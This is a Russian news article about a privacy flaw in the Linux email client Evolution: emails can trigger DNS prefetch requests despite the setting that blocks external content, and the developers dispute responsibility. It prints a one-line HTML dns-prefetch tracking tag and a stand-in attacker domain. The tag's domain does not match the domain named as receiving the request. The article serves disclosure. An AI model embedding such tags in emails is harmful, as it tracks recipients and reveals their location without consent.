Почтовый клиент Evolution для Linux сливает данные — даже при включенных настройках защиты

Когда речь заходит о почтовых клиентах, большинство вспоминает Outlook — он существует уже десятилетия. Но если вы используете Linux, то, скорее всего, слышали и об Evolution. Этот клиент, появившийся еще в 2000 году, считается «Outlook для Linux» — полноценным открытым менеджером личной информации с поддержкой IMAP, POP, Microsoft Exchange и других протоколов.

Одной из причин, по которой пользователи выбирают Evolution, является акцент на безопасность. Программа предлагает такие функции конфиденциальности, как отображение писем в виде обычного текста, поддержка шифрования GPG и настройка «Загружать внешнее содержимое» в параметрах безопасности. Эта функция должна блокировать трекинг-пиксели и не позволять отправителям узнавать, что письмо было прочитано.

Однако это доверие может оказаться ошибочным. Британский системный администратор по имени Майк Кардвелл (Mike Cardwell) выявил серьезную уязвимость. По его словам, если вредоносное письмо содержит HTML-тег следующего вида:

<link rel="dns-prefetch" href="some-tracking-domain.com">

то Evolution выполнит DNS-запрос к домену:

trackingcode.attackersdomain.example.com

сразу после открытия письма — даже если загрузка внешнего содержимого отключена.

Это значит, что отправитель сможет зафиксировать факт прочтения письма и потенциально определить ваше местоположение по IP-адресу вашего DNS-резолвера. Иными словами, функция конфиденциальности попросту не работает.

Кардвелл подал баг-репорт, однако разработчики Evolution отреагировали формально. Они заявили, что виноват движок WebKitGTK, который используется для отображения писем, и закрыли обращение, сославшись на аналогичный тикет от апреля 2024 года. Там указывалось, что WebKit уже с августа 2023 года содержит баг, позволяющий раскрывать IP-адрес пользователя, и прогресса в его устранении не наблюдается.

Кардвелл даже предложил решение: создать белый список безопасных HTML-тегов и удалять потенциально опасные до того, как письмо будет передано в браузерный движок. Он назвал это стратегией глубокой защиты, но разработчики вряд ли примут эту идею.

Теперь он рекомендует всем, кто заботится о своей приватности, отказаться от использования Evolution и выбрать другой почтовый клиент, поскольку, по его мнению, разработчики не считают проблему своей ответственностью.

Особую тревогу вызывает тот факт, что Evolution по умолчанию установлен в GNOME — одном из самых популярных окружений рабочего стола для Linux. Это значит, что уязвимость потенциально затрагивает тысячи пользователей на таких дистрибутивах, как Fedora — и большинство из них даже не подозревают об этом.